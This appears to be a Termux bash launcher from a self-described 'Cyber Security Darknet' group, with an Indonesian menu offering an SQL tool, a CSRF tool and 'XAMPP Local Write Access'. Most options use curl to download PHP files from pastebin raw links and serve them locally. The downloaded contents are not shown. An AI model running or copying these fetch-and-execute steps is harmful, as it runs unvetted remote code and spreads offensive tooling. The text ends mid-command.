#!/bin/bash
clear
sleep 1
echo "##############################"
echo "#  Created By Mr 4n0nsr00t   #"
echo "#                            #"
echo "# 01 Server PHP Martabak SQL #"
echo "# 02 PHP Server              #"
echo "# 03 CSRF ONlINE             #"
echo "# 04 XAMPP Local Write Access#"
echo "##############################"
echo "#    Santri Salafy Cyber     #"
echo "#    Security Darknet        #"
echo "#     One Squad Team         #"
echo "##############################"


read -p "Pilih_Nomor~#/ " n;


if [ $n = 01 ] || [ $n = 1 ];then
clear
pkg install php
clear
pkg install curl
clear
curl -LO https://pastebin.com/raw/YWXp5HR7
mv YWXp5HR7 martabak.php
clear
echo "<=====[ Info ]=====>"
echo "Nama Server: 127.0.0.1:8080"
echo "Ketik CTRL+C untuk exit atau menghentikannya"
echo "<=====================================>"
php -S 127.0.0.1:8080 martabak.php

fi

if [ $n = 02 ] || [ $n = 2 ];then
clear
termux-setup-storage
echo "<=====[ Info ]=====>"
echo "Nama Server: 127.0.0.1:8080"
echo "Ketik CTRL+C untuk exit atau menghentikannya"
read -p "Tempat_Menyimpan~#/ " s;
read -p "Nama_File~#/ " f;
cd $s
php -S 127.0.0.1:8080 $f
fi

if [ $n = 03 ] || [ $n = 3 ];then
pkg install curl
clear
pkg install php
clear
curl -LO https://pastebin.com/raw/1eftY8Pq
clear
echo "<=====[ Info ]=====>"
echo "Nama Server: 127.0.0.1:8080"
echo "Ketik CTRL+C untuk exit atau
menghentikan"
mv 1eftY8Pq csrf.php
php -S 127.0.0.1:8080 csrf.php
fi

if [ $n = 04 ] || [ $n = 4 ];then
pkg install curl
pkg install php
curl -LO https://pastebin.com/raw/efCRvgFZ
mv efCRvgFZ xampp.php
clear
echo "<=====[ Info ]=====>"
echo "Nama Server: 127.0.0.1:8080"
echo "Ketik CTRL+C untuk exit atau
